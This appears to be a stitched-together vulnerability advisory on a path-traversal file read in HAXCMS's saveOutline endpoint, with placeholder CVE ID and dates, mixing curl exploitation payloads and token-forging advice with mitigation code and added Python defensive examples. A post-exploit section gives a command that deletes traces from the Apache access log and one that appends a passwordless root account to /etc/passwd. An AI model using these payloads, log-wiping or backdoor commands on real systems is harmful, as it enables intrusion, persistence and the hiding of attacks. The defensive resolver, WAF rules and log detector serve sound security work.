HAXCMS, Local File Inclusion (LFI), CVE-2023-XXXX (Critical)


How the CVE Works

The vulnerability lies in how HAXCMS processes the `location` field of the `saveOutline` API endpoint. An authenticated attacker can set this field to a path traversal sequence (e.g., `../../../etc/passwd`), and the CMS writes it to site.json without sanitizing it. When the CMS later loads the outline data, it resolves the stored path, which yields an arbitrary file read. Since the web server user (typically www-data) can read many system files, sensitive data can be exfiltrated.

DailyCVE Form

Platform: HAXCMS
Version: <vX.X.X
Vulnerability: LFI
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch by Q3 2023

What Undercode Says:

Exploitation:

1. Auth Bypass: If JWT is weak, brute-force or forge tokens.
2. CSRF Bypass: Use `fetch()` with `credentials: include` to bypass CSRF.

3. Payload Crafting:

curl -X POST 'https://target/system/api/saveOutline' \
-H 'Authorization: Bearer JWT' \
-H 'X-CSRF-Token: XXX' \
-d '{"location":"../../../etc/passwd"}'

4. Exfiltration:

curl 'https://target/?load=../../../../etc/passwd' | grep root

Mitigation:

1. Input Sanitization:

$base = realpath(BASE_DIR);
$location = realpath(BASE_DIR . '/' . trim($_POST['location']));
// realpath() returns false for missing files; compare with a trailing separator so a sibling directory that shares the prefix is rejected
if ($location === false || strpos($location, $base . DIRECTORY_SEPARATOR) !== 0) { die("Invalid path"); }
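The containment check the mitigation above performs, and the flaw in the outline-loading path that it closes, as an added example in Python rather than HAXCMS's own PHP (this is not the project's code): an unsafe resolver beside a hardened one, exercised against a throwaway directory layout. The function names and the layout are assumptions; the hardened form handles the edge cases a prefix check has to cover, namely absolute paths, files that do not exist, and a sibling directory whose name shares the base path as a prefix.

```python
# Added example, not HAXCMS's own code: the containment check that the
# vulnerable outline-loading flow lacks, as an unsafe resolver beside a
# hardened one. The function names and the sandbox layout are assumptions.
import os
import tempfile


def resolve_unsafe(base_dir, location):
    # Vulnerable pattern: join the stored `location` onto the site directory
    # and trust the result, so "../" walks out of base_dir.
    return os.path.normpath(os.path.join(base_dir, location))


def resolve_safe(base_dir, location):
    """Return the real path of `location` inside `base_dir`, or None when the
    value is empty, absolute, escapes the directory, or names no regular file."""
    if not location or os.path.isabs(location):
        return None
    base = os.path.realpath(base_dir)
    # realpath() collapses ".." and symlinks before the prefix is compared.
    candidate = os.path.realpath(os.path.join(base, location))
    # Compare against base plus a separator so a sibling such as
    # /var/www/html_evil is not accepted as a child of /var/www/html.
    if not candidate.startswith(base + os.sep):
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Build a throwaway layout and exercise both resolvers; returns a dict of
    named checks that should all be True."""
    root = tempfile.mkdtemp()
    site = os.path.join(root, "site")          # stands in for the site directory
    sibling = os.path.join(root, "site_evil")  # sibling whose name shares the prefix
    os.mkdir(site)
    os.mkdir(sibling)
    with open(os.path.join(site, "site.json"), "w") as f:
        f.write('{"items": []}')
    with open(os.path.join(sibling, "leak.json"), "w") as f:
        f.write("{}")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed stand-in for /etc/passwd

    return {
        # the unsafe resolver walks straight to the file outside the site
        "unsafe_escapes": resolve_unsafe(site, "../secret.txt")
            == os.path.normpath(os.path.join(root, "secret.txt")),
        "safe_blocks_traversal": resolve_safe(site, "../secret.txt") is None,
        "safe_blocks_absolute": resolve_safe(site, os.path.join(root, "secret.txt")) is None,
        "safe_blocks_prefix_sibling": resolve_safe(site, "../site_evil/leak.json") is None,
        "safe_rejects_missing": resolve_safe(site, "missing.json") is None,
        "safe_allows_inside": resolve_safe(site, "site.json")
            == os.path.realpath(os.path.join(site, "site.json")),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

Resolving first and comparing afterwards is the order that matters: a check on the raw string can be bypassed with encoding or symlinks, while a check on the resolved path cannot. The separator appended to the base path is what keeps `/var/www/html_evil` from passing as a child of `/var/www/html`.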

2. Web Server:

location ~ \.json$ { deny all; }

3. PHP Hardening:

; keep the trailing slash: without it the value is a prefix match and /var/www/html_evil would also be allowed
open_basedir = /var/www/html/

4. WAF Rules:

# ARGS only covers a JSON body when the JSON request body processor is enabled (ctl:requestBodyProcessor=JSON)
modsecurity_rules 'SecRule ARGS "@contains ../" "id:1000,phase:2,deny"';

Detection:

# locates the handler that accepts the location field, for code review; exploitation attempts show up in access and WAF logs, not in source
grep -r "saveOutline" /var/www/haxcms --include="*.php"
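The grep above finds the code; spotting attempts against it means reading request logs. As an added example that is not part of the original post, the script below flags access-log requests whose URL-decoded target contains a traversal sequence, which is how the `?load=` exfiltration step of this LFI looks to a defender. The log lines are constructed, the combined-log layout and the helper names are assumptions, and the POST line is included to show that the payload in a JSON body never reaches the access log at all.

```python
# Added example, not part of the original post: flag access-log requests that
# carry path-traversal sequences, which is how the ?load= exfiltration step of
# this LFI looks to a defender. The log lines below are constructed, and the
# combined-log layout is assumed.
import re
from urllib.parse import unquote

# client ip, timestamp, request line, status (combined log format prefix)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# "../" or "..\" anywhere in the decoded request target
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target):
    # Which part of the flow a hit belongs to: planting the path or reading it.
    if "saveOutline" in target:
        return "saveOutline"
    if "load=" in target:
        return "load"
    return "other"


def find_traversal_requests(lines):
    """Return one finding per request whose decoded target contains traversal."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = decode_fully(m.group("target"))
        if TRAVERSAL_RE.search(target):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "target": target,
                "status": int(m.group("status")),
                "endpoint": classify(target),
            })
    return hits


# Constructed sample: the POST that plants the payload carries it in the JSON
# body, which an access log never records, so only the later GETs are visible
# here; catching the POST needs application-level or WAF body logging.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2023:12:00:01 +0000] "POST /system/api/saveOutline HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jun/2023:12:00:05 +0000] "GET /?load=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jun/2023:12:00:09 +0000] "GET /?load=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jun/2023:12:00:13 +0000] "GET /?load=%252e%252e%252fetc%252fpasswd HTTP/1.1" 403 153 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jun/2023:12:01:00 +0000] "GET /?load=pages/intro.json HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jun/2023:12:01:04 +0000] "GET /assets/..%2f..%2fsite.json HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["status"]} [{hit["endpoint"]}]')
```

A 200 on a traversal request is the line worth paging on, since it means the read succeeded; a 403 on the same pattern is the WAF or the hardened path check doing its job. Decoding in a loop rather than once is what makes the double-encoded variant visible.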

Post-Exploit:

1. Log Cleaning:

sed -i '/passwd/d' /var/log/apache2/access.log

2. Persistence:

echo 'malicious::0:0::/:/bin/bash' >> /etc/passwd

References:

Reported By: github.com
Extra Source Hub: Undercode
